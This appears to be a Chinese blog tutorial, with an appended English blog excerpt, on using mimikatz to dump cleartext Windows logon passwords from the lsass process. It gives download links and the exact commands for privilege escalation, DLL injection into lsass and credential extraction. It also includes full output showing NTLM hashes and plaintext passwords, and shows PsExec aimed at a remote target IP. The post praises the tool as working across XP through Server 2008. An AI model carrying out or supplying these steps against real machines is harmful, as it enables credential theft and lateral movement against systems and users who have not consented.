用mimikatz来获取win7的密码

本文介绍如何利用Mimikatz工具在Windows 7操作系统中获取用户登录密码,包括工具的下载链接及详细步骤说明。通过提升权限、注入DLL到lsass进程并抓取密码等操作实现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

mimikatz下载地址:

http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip


blog.gentilkiwi.com应该是法国佬的博客。


用mimikatz来获取win7的密码:


Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\Administrator>cd C:\mimikatz_trunk\tools

C:\mimikatz_trunk\tools>PsExec.exe \\127.0.0.1 cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>cd C:\mimikatz_trunk\Win32

C:\mimikatz_trunk\Win32>mimikatz.exe mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privil猫ge : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect茅 脿 un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des donn茅es de s茅curit茅s dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;395889
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;155584
Package d'authentification  : NTLM
Utilisateur principal       : ANONYMOUS LOGON
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;75419
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : LOCAL SERVICE
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;40847
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

mimikatz # exit
Fermeture du canal de communication

C:\mimikatz_trunk\Win32>


wdigest后面的就是密码。如上所示,我的win7的Administrator的密码是yang。


工具的作者的blog:http://blog.gentilkiwi.com/mimikatz


解释:

privilege::debug  //提升权限


inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"   //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!


@getLogonPasswords  //抓取密码


exit  //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环


另外,我测试的时候,是在win7上测试的。还可以在XP上来连接win7,只需要修改一下IP,例如:

PsExec.exe \\192.168.1.123 cmd.exe

把上面的192.168.1.123改为目标的IP。

32位 64位均可 不过在测试过程中 前掉至少得以ADMIN权限运行 法国黑客神器 mimikatz 直接读取管理员密码明文 通杀xp win2003 win7 win2008 WIN2000还未测试 个人感觉应该也可以 没打建环境测试 还有一篇用这个神器直接从 lsass.exe获取windows处于active状态账号明文密码的文章 自己尝试了下用 win2008 r2 x64 来测试 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~ mimikatz: Tool To Recover Cleartext Passwords From Lsass I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe sekurlsa.dllPROCESSENTRY32(lsass.exe).th32ProcessID = 488Attente de connexion du client...Serveur connecté à un client !Message du processus :Bienvenue dans un processus distant Gentil KiwiSekurLSA : librairie de manipulation des données de sécurités dans LSASSmimikatz # @getLogonPasswordsAuthentification Id : 0;434898Package d'authentification : NTLMUtilisateur principal : Gentil UserDomaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : passwordAuthentification Id : 0;269806Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Posted in Blog
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值